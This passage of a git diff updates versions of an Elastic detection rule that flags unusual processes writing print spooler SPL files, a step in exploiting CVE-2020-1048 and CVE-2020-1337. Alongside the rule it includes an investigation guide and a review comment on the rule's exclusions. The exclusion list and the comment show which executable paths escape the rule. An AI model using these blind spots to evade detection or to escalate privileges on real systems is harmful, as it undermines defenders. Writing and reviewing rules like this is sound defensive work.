Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : \"spl\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\PRINTERS\\\\*\" and\n not process.name : (\"spoolsv.exe\",\n \"printfilterpipelinesvc.exe\",\n \"PrintIsolationHost.exe\",\n \"splwow64.exe\",\n \"msiexec.exe\",\n \"poqexec.exe\") and\n not user.id : \"S-1-5-18\" and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"\\\\Device\\\\Mup\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\printui.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\PROGRA~1\\\\*.exe\",\n \"?:\\\\PROGRA~2\\\\*.exe\")\n", "references": [ "https://safebreach.com/Post/How-we-bypassed-CVE-2020-1048-Patch-and-got-CVE-2020-1337" 
@@ -68,7 +68,7 @@ ], "risk_score": 73, "rule_id": "a7ccae7b-9d2c-44b2-a061-98e5946971fa", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_105.json b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_105.json index d28c98065be..dd87ff8ca35 100644 --- a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_105.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Print Spooler SPL File Created", - "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : \"spl\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\PRINTERS\\\\*\" and\n not process.name : (\"spoolsv.exe\",\n \"printfilterpipelinesvc.exe\",\n \"PrintIsolationHost.exe\",\n \"splwow64.exe\",\n \"msiexec.exe\",\n \"poqexec.exe\") and\n not user.id : \"S-1-5-18\" and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"\\\\Device\\\\Mup\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\printui.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\PROGRA~1\\\\*.exe\",\n \"?:\\\\PROGRA~2\\\\*.exe\")\n", "references": [ "https://safebreach.com/Post/How-we-bypassed-CVE-2020-1048-Patch-and-got-CVE-2020-1337" 
@@ -68,7 +68,7 @@
 ],
 "risk_score": 73,
 "rule_id": "a7ccae7b-9d2c-44b2-a061-98e5946971fa",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -81,7 +81,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_106.json b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_106.json
index 85126db18bd..c151db1a19a 100644
--- a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_106.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Suspicious Print Spooler SPL File Created",
- "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : \"spl\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\PRINTERS\\\\*\" and\n not process.name : (\"spoolsv.exe\",\n \"printfilterpipelinesvc.exe\",\n \"PrintIsolationHost.exe\",\n \"splwow64.exe\",\n \"msiexec.exe\",\n \"poqexec.exe\") and\n not user.id : \"S-1-5-18\" and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"\\\\Device\\\\Mup\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\printui.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\PROGRA~1\\\\*.exe\",\n \"?:\\\\PROGRA~2\\\\*.exe\")\n", "references": [ "https://safebreach.com/Post/How-we-bypassed-CVE-2020-1048-Patch-and-got-CVE-2020-1337" 
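Review bot: The new-side EQL query's `process.executable` exclusion lists the value `?:\\Windows\\System32\\mmc.exe` twice (first and fourth entries), so one of them is redundant and should be dropped; since these rule files appear to be regenerated from an upstream rule source rather than hand-edited here, the fix presumably belongs there. The investigation guide in the same `note` value tells the analyst to look for logon events `after the registry modification`, but this rule fires on SPL file creation, not a registry write, so `after the SPL file creation` would be the accurate wording. The blanket `?:\\Program Files\\*.exe`, `?:\\Program Files (x86)\\*.exe` and `\\Device\\Mup\\*.exe` exclusions mean any writer launched from those paths is never evaluated; that looks like a deliberate false-positive trade-off, but a one-line comment in the rule source recording why would help future tuning. The same duplicate entry and wording issue appear in the hunk for a7ccae7b-9d2c-44b2-a061-98e5946971fa_107.json ending at its `"references"` line, and as far as is visible in the cut-off hunk for _108.json.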
@@ -68,7 +68,7 @@
 ],
 "risk_score": 73,
 "rule_id": "a7ccae7b-9d2c-44b2-a061-98e5946971fa",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -81,7 +81,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_107.json b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_107.json
index 237004b1e6d..88cdb23bbe4 100644
--- a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_107.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Suspicious Print Spooler SPL File Created",
- "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
